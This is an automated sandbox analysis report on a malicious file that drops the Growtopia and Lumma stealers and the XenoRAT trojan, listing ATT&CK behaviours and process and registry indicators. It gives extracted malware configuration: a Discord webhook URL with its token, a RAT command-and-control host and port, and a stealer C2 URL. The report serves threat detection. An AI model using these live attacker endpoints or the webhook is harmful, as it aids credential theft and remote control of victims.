growtopia | 8ac9770ac25122bada4cabfd6d6e816202f971fbea251a30c58685ef90eb6b14

Analysis

max time kernel
522s
max time network
522s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2024 22:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Obey_Omnis_e-GT.ini
Size

1KB
MD5

349f67039b55a7fac3a9a4a7c0dc6e4a
SHA1

24f305aa729c4f64fedf020a839b615e98e66d4b
SHA256

8ac9770ac25122bada4cabfd6d6e816202f971fbea251a30c58685ef90eb6b14
SHA512

9cb510b81969e5f51d9722465121078f1c3439de81e18cdc6261d08d5f3b516b081c893d1f1a6e374797a24f6cab9358675004ae3ae9ac51f20e061dc31bf33c

Score

10^/10

growtopia lumma xenorat defense_evasion discovery evasion execution persistence pyinstaller rat stealer trojan

Malware Config

Extracted

Family

growtopia

https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj

Extracted

Family

xenorat

jctestwindows.airdns.org

Mutex

Xeno_rat_nd8913d

Attributes

delay
5000
install_path
temp
port
45010
startup_name
WindowsErrorHandler

Extracted

Family

lumma

https://tenntysjuxmz.shop/api

Signatures

Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4712	powershell.exe
5320	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WinErrorMgr.exe

Executes dropped EXE 14 IoCs

pid	Process
2460	Ilkdt.exe
3708	WinHostMgr.exe
2020	WinErrorMgr.exe
3896	KeyGeneratorI.exe
3524	Sahyui1337.exe
1432	KeyGeneratorI.exe
5260	WinErrorMgr.exe
396	Ilkdt.exe
952	WinHostMgr.exe
7372	WinErrorMgr.exe
7588	Sahyui1337.exe
7260	KeyGeneratorI.exe
6576	KeyGeneratorI.exe
5424	bauwrdgwodhv.exe

Loads dropped DLL 17 IoCs

pid	Process
1432	KeyGeneratorI.exe
1432	KeyGeneratorI.exe
1432	KeyGeneratorI.exe
1432	KeyGeneratorI.exe
6576	KeyGeneratorI.exe
6576	KeyGeneratorI.exe
6576	KeyGeneratorI.exe
6576	KeyGeneratorI.exe
8176	RootLauncher.exe
2952	RootLauncher.exe
2920	RootLauncher.exe
3528	RootLauncher.exe
2324	RootLauncher.exe
1492	RootLauncher.exe
4988	RootLauncher.exe
2916	RootLauncher.exe
1336	RootLauncher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
477	discord.com
481	pastebin.com
482	pastebin.com
34	mediafire.com
35	mediafire.com
36	mediafire.com
410	discord.com
411	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
833	whatismyip.com
834	whatismyip.com
648	api.ipgeolocation.io
650	api.ipgeolocation.io
832	whatismyip.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5356	powercfg.exe
8000	powercfg.exe
7988	powercfg.exe
8100	powercfg.exe
8136	powercfg.exe
5488	powercfg.exe
5456	powercfg.exe
5344	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File opened for modification	C:\Windows\system32\MRT.exe	WinHostMgr.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	bauwrdgwodhv.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 5424 set thread context of 8156	5424	bauwrdgwodhv.exe	215
PID 5424 set thread context of 1504	5424	bauwrdgwodhv.exe	220
PID 8176 set thread context of 4128	8176	RootLauncher.exe	322
PID 2952 set thread context of 2328	2952	RootLauncher.exe	325
PID 2920 set thread context of 6232	2920	RootLauncher.exe	328
PID 3528 set thread context of 5308	3528	RootLauncher.exe	331
PID 2324 set thread context of 6708	2324	RootLauncher.exe	347
PID 1492 set thread context of 6836	1492	RootLauncher.exe	350
PID 4988 set thread context of 6448	4988	RootLauncher.exe	353
PID 2916 set thread context of 3736	2916	RootLauncher.exe	356
PID 1336 set thread context of 7968	1336	RootLauncher.exe	359

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6912	sc.exe
5472	sc.exe
7796	sc.exe
5248	sc.exe
7016	sc.exe
7516	sc.exe
7872	sc.exe
8160	sc.exe
8132	sc.exe
7924	sc.exe
7748	sc.exe
8128	sc.exe
7392	sc.exe
4624	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000a0000000234d2-824.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinErrorMgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinErrorMgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinErrorMgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ilkdt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RootLauncher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ilkdt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-945322488-2060912225-3527527000-1000\{B2DB9906-7873-4DE8-A347-251DB936AD33}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6364	schtasks.exe
7844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
2716	chrome.exe
2716	chrome.exe
2716	chrome.exe
2716	chrome.exe
3524	Sahyui1337.exe
3524	Sahyui1337.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
4400	msedge.exe
4400	msedge.exe
4380	msedge.exe
4380	msedge.exe
6228	identity_helper.exe
6228	identity_helper.exe
3708	WinHostMgr.exe
7588	Sahyui1337.exe
7588	Sahyui1337.exe
7588	Sahyui1337.exe
6488	powershell.exe
6488	powershell.exe
4712	powershell.exe
4712	powershell.exe
6488	powershell.exe
4712	powershell.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
3708	WinHostMgr.exe
5424	bauwrdgwodhv.exe
5320	powershell.exe
5320	powershell.exe
5320	powershell.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
5424	bauwrdgwodhv.exe
1504	explorer.exe
1504	explorer.exe
1504	explorer.exe
1504	explorer.exe
1504	explorer.exe
1504	explorer.exe
1504	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
6440	msedge.exe
6440	msedge.exe
6440	msedge.exe
6440	msedge.exe
6440	msedge.exe
6440	msedge.exe
6440	msedge.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe
4744	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe
Token: SeShutdownPrivilege	3868	chrome.exe
Token: SeCreatePagefilePrivilege	3868	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe
5900	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
740	Installer.exe
4808	Installer.exe
3896	KeyGeneratorI.exe
1432	KeyGeneratorI.exe
7260	KeyGeneratorI.exe
6576	KeyGeneratorI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3868 wrote to memory of 4228	3868	chrome.exe	87
PID 3868 wrote to memory of 4228	3868	chrome.exe	87
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
